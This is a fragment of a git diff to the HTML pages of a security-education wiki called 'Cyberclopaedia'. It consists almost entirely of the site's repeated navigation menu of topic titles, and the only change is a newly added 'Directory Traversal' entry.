      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -186,22 +186,6 @@

Introduction - - diff --git a/docs/Cryptography/Key Management/Key Exchange/index.html b/docs/Cryptography/Key Management/Key Exchange/index.html index 52c5f364..6bf9e287 100644 --- a/docs/Cryptography/Key Management/Key Exchange/index.html +++ b/docs/Cryptography/Key Management/Key Exchange/index.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -174,22 +174,6 @@

The Cyberclopaedia

- - diff --git a/docs/Cryptography/Key Management/index.html b/docs/Cryptography/Key Management/index.html index ec4d2f47..163eeac2 100644 --- a/docs/Cryptography/Key Management/index.html +++ b/docs/Cryptography/Key Management/index.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
